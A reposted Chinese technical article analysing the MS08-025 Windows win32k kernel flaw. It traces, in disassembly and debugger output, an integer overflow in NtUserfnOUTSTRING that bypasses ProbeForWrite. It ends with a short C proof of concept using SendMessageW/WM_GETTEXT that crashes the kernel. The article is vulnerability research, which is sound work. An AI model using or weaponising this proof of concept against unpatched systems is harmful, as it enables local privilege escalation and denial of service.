漏洞对于系统用户来说并不陌生,几乎是所有的系统和软件都会有漏洞产生。我们几乎就是在填补漏洞和发现新漏洞中使用系统的。ms08025漏洞是一个可被攻击者利用的漏洞,本篇文章分析了ms08025漏洞补丁,下面我们就从NtUserfnOUTSTRING 函数中的问题来展开我们的分析。
.text:BF86FB04 ; int __stdcall NtUserfnOUTSTRING(int,int,int,PVOID Address,int,int,int)
.text:BF86FB04 __stdcall NtUserfnOUTSTRING(x, x, x, x, x, x, x) proc near
.text:BF86FB04 ; CODE XREF: xxxDefWindowProc(x,x,x,x)+6Ep
.text:BF86FB04 ; NtUserMessageCall(x,x,x,x,x,x,x)+61p
.text:BF86FB04 ; xxxSendMessageToClient(x,x,x,x,x,x,x)-Ep
.text:BF86FB04 ; xxxSendMessageToClient(x,x,x,x,x,x,x)+6Dp
.text:BF86FB04 ; xxxWrapCallWindowProc(x,x,x,x,x)-4Bp
.text:BF86FB04 ; xxxWrapCallWindowProc(x,x,x,x,x)+60p ...
.text:BF86FB04
.text:BF86FB04 var_24 = dword ptr -24h
.text:BF86FB04 var_20 = dword ptr -20h
.text:BF86FB04 UserBuffer = dword ptr -1Ch
.text:BF86FB04 ms_exc = CPPEH_RECORD ptr -18h
.text:BF86FB04 arg_0 = dword ptr 8
.text:BF86FB04 arg_4 = dword ptr 0Ch
.text:BF86FB04 arg_8 = dword ptr 10h
.text:BF86FB04 Address = dword ptr 14h
.text:BF86FB04 arg_10 = dword ptr 18h
.text:BF86FB04 arg_14 = dword ptr 1Ch
.text:BF86FB04 arg_18 = dword ptr 20h
.text:BF86FB04
.text:BF86FB04 ; FUNCTION CHUNK AT .text:BF86FAE1 SIZE 0000001E BYTES
.text:BF86FB04
.text:BF86FB04 push14h
.text:BF86FB06 pushoffset unk_BF98D250
.text:BF86FB0B call__SEH_prolog
.text:BF86FB0B
.text:BF86FB10 xor edx, edx
.text:BF86FB12 mov [ebp+ms_exc.disabled], edx
.text:BF86FB15 mov eax, [ebp+var_20]
.text:BF86FB18 mov ecx, 7FFFFFFFh
.text:BF86FB1D and eax, ecx
.text:BF86FB1F mov esi, [ebp+arg_18]
.text:BF86FB22 shl esi, 1Fh
.text:BF86FB25 or eax, esi
.text:BF86FB27 mov [ebp+var_20], eax
.text:BF86FB2A mov esi, eax
.text:BF86FB2C xor esi, [ebp+arg_8] -> esi = 缓冲区长度
.text:BF86FB2F and esi, ecx
.text:BF86FB31 xor eax, esi
.text:BF86FB33 mov [ebp+var_20], eax
.text:BF86FB36 cmp [ebp+arg_18], edx -> 如果是 ansi 方式就直接进行检查否则需要计算unicode的大小
.text:BF86FB39 jnz short loc_BF86FB47
.text:BF86FB39
.text:BF86FB3B lea esi, [eax+eax]<- 注意这里,问题就在这此时 eax = unicode字符串的长度,
<- 当 eax = 0x80000000 的时候 eax + eax = 0x100000000,32位的寄存器
<- 被溢出了,esi = 0
.text:BF86FB3E xor esi, eax
.text:BF86FB40 and esi, ecx
.text:BF86FB42 xor eax, esi
.text:BF86FB44 mov [ebp+var_20], eax -> 保存unicode占用的空间大小
.text:BF86FB44
.text:BF86FB47
.text:BF86FB47 loc_BF86FB47: ; CODE XREF: NtUserfnOUTSTRING(x,x,x,x,x,x,x)+35j
.text:BF86FB47 mov [ebp+var_24], edx
.text:BF86FB4A mov esi, [ebp+Address]
.text:BF86FB4D mov [ebp+UserBuffer], esi
.text:BF86FB50 xor ebx, ebx
.text:BF86FB52 inc ebx
.text:BF86FB53 pushebx ; Alignment
.text:BF86FB54 and eax, ecx
.text:BF86FB56 pusheax ; Length <- 由于 eax = 0,所以ProbeForWrite被绕过
.text:BF86FB57 pushesi ; Address
.text:BF86FB58 callds:ProbeForWrite(x,x,x)
bf80a1b0 e96ef4ffff jmp win32k!xxxRealDefWindowProc+0x1235 (bf809623)
bf80a1b5 d1e8 shr eax,1
bf80a1b7 894510 mov [ebp+0x10],eax
bf80a1ba ebf1 jmpwin32k!xxxRealDefWindowProc+0x190 (bf80a1ad)
bf80a1bc 8b4514 mov eax,[ebp+0x14]
bf80a1bf f6400780 testbyte ptr [eax+0x7],0x80
bf80a1c3 8b4008 mov eax,[eax+0x8]
bf80a1c6 7408 jz win32k!xxxRealDefWindowProc+0x105 (bf80a1d0)
bf80a1c8 c60000 mov byte ptr [eax],0x0
bf80a1cb e951f4ffff jmp win32k!xxxRealDefWindowProc+0x1225 (bf809621)
bf80a1d0 668910 mov [eax],dx<- 在这里,对前面传入的指针进行了2个字节的写操作,写入的数据为0
bf80a1d3 e949f4ffff jmp win32k!xxxRealDefWindowProc+0x1225 (bf809621)
bf80a1d8 6a00 push0x0
bf80a1da 6a02 push0x2
bf80a1dc ff7638 pushdword ptr [esi+0x38]
bf80a1df e8d1690200 callwin32k!BuildHwndList (bf830bb5)
bf80a1e4 8bf8 mov edi,eax
bf80a1e6 85ff testedi,edi
bf80a1e8 0f8433f4ffff jewin32k!xxxRealDefWindowProc+0x1225 (bf809621)
bf80a1ee 8d7710 lea esi,[edi+0x10]
那么怎么触发ms08025漏洞呢,我又分析了user32.dll 和 win32k!NtUserMessageCall,发现触发这个漏洞很简单,只需要调用 SendMessageW 发送WM_GETTEXT 消息就能够触发了,下面是poc代码(注,改代码运行后由于在内核写了未映射的内存,会直接蓝屏,要改成可用的exploit,可以参考我以前的exploit)
- #include
- #include
- int main(int argc,char *argv[])
- {
- DWORDdwHookAddress = 0x80000000;
- printf( "\tMS08-025 Local Privilege Escalation Vulnerability Exploit(POC)\n\n" );
- printf( "Create by Whitecell's Polymorphours@whitecell.org 2008/04/10\n" );
- SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, dwHookAddress );
- return 0;
- }
当前题目:ms08025内核漏洞深度分析
转载源于:http://www.shufengxianlan.com/qtweb/news2/467402.html
网站建设、网络推广公司-创新互联,是专注品牌与效果的网站制作,网络营销seo公司;服务项目有等
声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 创新互联